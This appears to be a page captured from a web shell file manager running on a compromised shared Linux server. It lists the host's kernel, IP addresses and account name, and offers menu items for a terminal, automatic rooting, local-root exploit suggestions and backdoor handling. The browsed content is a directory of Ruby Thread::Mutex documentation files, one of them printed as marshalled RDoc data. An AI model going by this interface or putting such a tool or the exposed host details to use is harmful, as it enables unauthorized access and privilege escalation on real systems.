Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.60
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby31 /
share /
ri /
system /
Thread /
Mutex /
Delete
Unzip
Name
Size
Permission
Date
Action
cdesc-Mutex.ri
1.07
KB
-rw-r--r--
2025-04-28 21:06
lock-i.ri
424
B
-rw-r--r--
2025-04-28 21:06
locked%3f-i.ri
372
B
-rw-r--r--
2025-04-28 21:06
new-c.ri
320
B
-rw-r--r--
2025-04-28 21:06
owned%3f-i.ri
372
B
-rw-r--r--
2025-04-28 21:06
sleep-i.ri
837
B
-rw-r--r--
2025-04-28 21:06
synchronize-i.ri
463
B
-rw-r--r--
2025-04-28 21:06
try_lock-i.ri
413
B
-rw-r--r--
2025-04-28 21:06
unlock-i.ri
395
B
-rw-r--r--
2025-04-28 21:06
Save
Rename
U:RDoc::AnyMethod[iI" sleep:ETI"Thread::Mutex#sleep;TF:privateo:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [I"GReleases the lock and sleeps +timeout+ seconds if it is given and ;TI"Knon-nil or forever. Raises +ThreadError+ if +mutex+ wasn't locked by ;TI"the current thread.;To:RDoc::Markup::BlankLine o; ; [I"DWhen the thread is next woken up, it will attempt to reacquire ;TI"the lock.;T@o; ; [I"KNote that this method can wakeup without explicit Thread#wakeup call. ;TI"-For example, receiving signal and so on.;T@o; ; [I"JReturns the slept time in seconds if woken up, or +nil+ if timed out.;T: @fileI"thread_sync.c;T:0@omit_headings_from_table_of_contents_below0I"4mutex.sleep(timeout = nil) -> number or nil ;T0[ I"(*args);T@FI" Mutex;TcRDoc::NormalClass00